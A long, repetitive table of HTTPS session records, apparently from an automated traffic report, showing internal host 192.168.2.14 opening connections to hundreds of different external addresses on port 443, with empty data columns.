                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15517192.168.2.1447458172.216.231.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15518192.168.2.1452646193.156.230.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15519192.168.2.145704062.146.72.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15520192.168.2.1435328192.229.112.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15521192.168.2.145062444.37.252.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15522192.168.2.146052083.216.205.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15523192.168.2.1448860206.251.112.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15524192.168.2.1441594221.95.182.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15525192.168.2.1455792178.152.56.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15526192.168.2.1444556194.114.148.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15527192.168.2.144898417.233.38.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15528192.168.2.144405089.193.75.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15529192.168.2.1446420177.132.6.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15530192.168.2.1447296202.75.82.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15531192.168.2.1442352173.84.224.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15532192.168.2.1449368171.121.231.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15533192.168.2.144925227.146.207.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15534192.168.2.1447026111.146.104.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15535192.168.2.1445664111.91.56.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15536192.168.2.1454190144.194.41.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15537192.168.2.1442152218.252.255.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15538192.168.2.1440458150.76.84.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15539192.168.2.1460178133.216.191.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15540192.168.2.1437508191.101.90.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15541192.168.2.1460464206.100.25.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15542192.168.2.1448570220.200.189.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15543192.168.2.1440728211.81.128.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15544192.168.2.143853084.172.147.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15545192.168.2.1453054116.166.238.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15546192.168.2.1445770148.77.167.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15547192.168.2.1436538147.66.49.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15548192.168.2.1434802188.226.79.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15549192.168.2.1446828189.84.24.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15550192.168.2.1443772110.87.24.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15551192.168.2.1458104172.214.229.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15552192.168.2.1436532106.155.46.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15553192.168.2.1436676161.132.209.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15554192.168.2.1456552146.2.174.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15555192.168.2.144673231.2.232.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15556192.168.2.1443836182.226.152.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15557192.168.2.1450322205.189.76.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15558192.168.2.145184299.253.15.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15559192.168.2.144525292.216.160.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15560192.168.2.146069020.94.157.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15561192.168.2.1456900212.205.41.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15562192.168.2.1453094128.56.102.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15563192.168.2.144246841.47.56.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15564192.168.2.144268285.14.17.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15565192.168.2.1456228101.236.108.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15566192.168.2.144744497.236.219.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15567192.168.2.1448714183.57.91.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15568192.168.2.1450074117.117.203.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15569192.168.2.143546824.12.115.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15570192.168.2.1455598105.83.58.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15571192.168.2.143749698.235.21.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15572192.168.2.1457426150.240.194.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15573192.168.2.143569485.84.230.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15574192.168.2.145806280.57.142.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15575192.168.2.1447826189.100.7.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15576192.168.2.144414627.187.117.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15577192.168.2.1440376206.172.132.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15578192.168.2.1435008126.51.219.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15579192.168.2.1444566104.72.51.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15580192.168.2.143444827.116.132.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15581192.168.2.143420212.75.179.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15582192.168.2.1434450217.166.21.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15583192.168.2.1444082166.206.14.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15584192.168.2.1443240117.243.31.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15585192.168.2.1442872140.154.6.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15586192.168.2.143946491.189.211.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15587192.168.2.144008283.197.58.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15588192.168.2.1442572168.63.84.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15589192.168.2.1459302187.123.194.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15590192.168.2.1433858158.9.227.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15591192.168.2.1455986135.58.140.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15592192.168.2.1457772108.79.2.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15593192.168.2.1445918150.159.7.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15594192.168.2.1438162120.242.134.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15595192.168.2.144479263.113.65.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15596192.168.2.1450584141.246.25.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15597192.168.2.1447890185.235.254.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15598192.168.2.1445828111.133.158.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15599192.168.2.1439982181.63.93.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15600192.168.2.145594690.114.213.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15601192.168.2.1446318108.247.162.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15602192.168.2.145325668.88.114.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15603192.168.2.1441250222.115.64.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15604192.168.2.145710018.173.111.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15605192.168.2.1452146168.109.37.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15606192.168.2.1433512206.233.53.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15607192.168.2.146055866.9.118.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15608192.168.2.1438146124.154.137.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15609192.168.2.144084097.191.227.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15610192.168.2.144526092.128.151.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15611192.168.2.1435080128.233.9.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15612192.168.2.1437504138.244.72.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15613192.168.2.1447116189.223.164.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15614192.168.2.1458606115.204.69.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15615192.168.2.1444708195.222.135.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15616192.168.2.144959075.210.182.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15617192.168.2.146051260.151.219.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15618192.168.2.143893039.80.42.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15619192.168.2.1437210177.102.162.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15620192.168.2.1434240139.217.153.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15621192.168.2.143519893.81.201.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15622192.168.2.1445696212.241.204.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15623192.168.2.1449552169.216.153.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15624192.168.2.1435374218.255.2.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15625192.168.2.145814292.135.129.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15626192.168.2.1456828116.23.175.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15627192.168.2.1456830208.189.146.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15628192.168.2.1448870131.153.237.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15629192.168.2.1452002193.146.11.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15630192.168.2.145906498.19.90.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15631192.168.2.1434754114.92.30.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15632192.168.2.145619087.86.69.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15633192.168.2.145221486.224.214.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15634192.168.2.1445180213.239.245.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15635192.168.2.144027451.135.253.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15636192.168.2.144651232.95.248.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15637192.168.2.143723218.31.54.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15638192.168.2.14457949.115.214.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15639192.168.2.146095242.203.205.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15640192.168.2.14574244.150.74.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15641192.168.2.1454180144.54.160.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15642192.168.2.143328693.242.30.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15643192.168.2.1459186122.66.141.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15644192.168.2.143728470.6.21.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15645192.168.2.1432930100.238.99.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15646192.168.2.144583852.213.33.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15647192.168.2.1460324193.228.134.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15648192.168.2.1439936174.17.217.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15649192.168.2.1444694155.7.216.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15650192.168.2.1450700173.67.133.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15651192.168.2.145649470.43.90.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15652192.168.2.1449776223.103.16.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15653192.168.2.1452406181.233.142.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15654192.168.2.1442496156.250.140.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15655192.168.2.1439636111.162.190.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15656192.168.2.1460676217.24.167.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15657192.168.2.1460494149.91.57.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15658192.168.2.144001266.96.240.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15659192.168.2.144681695.65.182.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15660192.168.2.145039299.227.188.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15661192.168.2.1445870133.41.200.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15662192.168.2.145401667.45.23.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15663192.168.2.1443490171.183.102.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15664192.168.2.1434638222.50.83.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15665192.168.2.145870219.73.23.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15666192.168.2.1459400199.5.185.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15667192.168.2.145519691.184.162.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15668192.168.2.1453816153.199.33.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15669192.168.2.1451836131.190.104.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15670192.168.2.144629846.48.191.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15671192.168.2.143601827.28.171.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15672192.168.2.1443794198.109.27.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15673192.168.2.144833471.195.195.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15674192.168.2.1456390122.42.208.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15675192.168.2.1457194172.180.89.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15676192.168.2.1438898128.135.153.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15677192.168.2.143668499.35.182.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15678192.168.2.1444976212.28.42.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15679192.168.2.143531644.206.37.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15680192.168.2.1436846183.205.66.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15681192.168.2.1449288111.12.235.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15682192.168.2.1441134135.153.250.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15683192.168.2.1447802145.190.27.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15684192.168.2.1441698209.127.109.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15685192.168.2.1445016107.48.106.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15686192.168.2.1446866167.235.222.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15687192.168.2.144220212.158.21.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15688192.168.2.144107287.0.125.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15689192.168.2.1453418219.124.116.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15690192.168.2.1438840162.57.51.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15691192.168.2.1460918171.89.77.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15692192.168.2.1458614141.251.243.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15693192.168.2.14379041.68.70.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15694192.168.2.145532814.133.188.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15695192.168.2.1455806221.232.145.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15696192.168.2.1445750115.14.93.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15697192.168.2.14412922.46.129.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15698192.168.2.143562277.68.118.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15699192.168.2.1441212205.80.33.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15700192.168.2.1449948109.28.233.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15701192.168.2.144261638.52.74.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15702192.168.2.1448404173.176.198.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15703192.168.2.1439910117.17.26.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15704192.168.2.1445784137.20.29.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15705192.168.2.1438968196.170.62.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15706192.168.2.1453338169.18.17.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15707192.168.2.1443790132.162.55.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15708192.168.2.145439866.42.107.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15709192.168.2.144011091.255.200.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15710192.168.2.143920298.250.251.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15711192.168.2.1458548193.251.121.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15712192.168.2.145800017.249.52.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15713192.168.2.144552699.197.100.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15714192.168.2.1442194198.105.190.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15715192.168.2.145385062.115.207.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15716192.168.2.1438960110.43.248.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15717192.168.2.1447096142.101.54.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15718192.168.2.143361468.11.90.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15719192.168.2.1435652134.23.247.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15720192.168.2.1441578199.155.181.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15721192.168.2.1444648161.148.251.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15722192.168.2.145623648.227.190.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15723192.168.2.1448140201.193.45.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15724192.168.2.1436732182.250.156.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15725192.168.2.145944676.175.206.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15726192.168.2.145932814.202.30.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15727192.168.2.1436650200.78.15.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15728192.168.2.1449028204.61.110.87443
                                                        TimestampBytes transferredDirectionData


